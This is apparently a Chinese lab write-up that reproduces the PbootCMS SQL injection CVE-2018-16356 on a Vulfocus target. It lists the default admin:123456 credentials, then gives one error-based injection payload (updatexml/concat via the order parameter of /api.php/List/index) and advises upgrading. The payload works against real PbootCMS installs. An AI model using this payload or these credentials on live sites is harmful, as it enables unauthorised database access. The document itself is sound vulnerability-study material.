[Vulfocus解题系列]pbootcms SQL注入 (CVE-2018-16356)

简介

PbootCMS是一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。 PbootCMS中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 后台路径:/admin.php 用户名密码:admin:123456 授权码自行获取:https://www.pbootcms.com/freesn/

靶场搭建

使用在线靶场http://vulfocus.fofa.so
[Vulfocus解题系列]pbootcms SQL注入 (CVE-2018-16356)_第1张图片
进入环境,发现需要获取授权码
[Vulfocus解题系列]pbootcms SQL注入 (CVE-2018-16356)_第2张图片
https://www.pbootcms.com/freesn/
进入网站,输入域名获取授权码
[Vulfocus解题系列]pbootcms SQL注入 (CVE-2018-16356)_第3张图片
然后进入网站后台
后台路径:/admin.php 用户名密码:admin:123456
[Vulfocus解题系列]pbootcms SQL注入 (CVE-2018-16356)_第4张图片
[Vulfocus解题系列]pbootcms SQL注入 (CVE-2018-16356)_第5张图片
输入域名授权码并提交

[Vulfocus解题系列]pbootcms SQL注入 (CVE-2018-16356)_第6张图片
将API启用
[Vulfocus解题系列]pbootcms SQL注入 (CVE-2018-16356)_第7张图片
再次访问网站,已经可以正常访问了

漏洞复现

构造payload

/api.php/List/index?order=123%20and(updatexml(1,concat(0x7e,(select%20md5(1954))),1))%20%23

在这里插入图片描述
payload中的md5(1954)被执行,证明漏洞存在。

修复

升级为最新版本

你可能感兴趣的:(漏洞复现,sql,安全,web安全)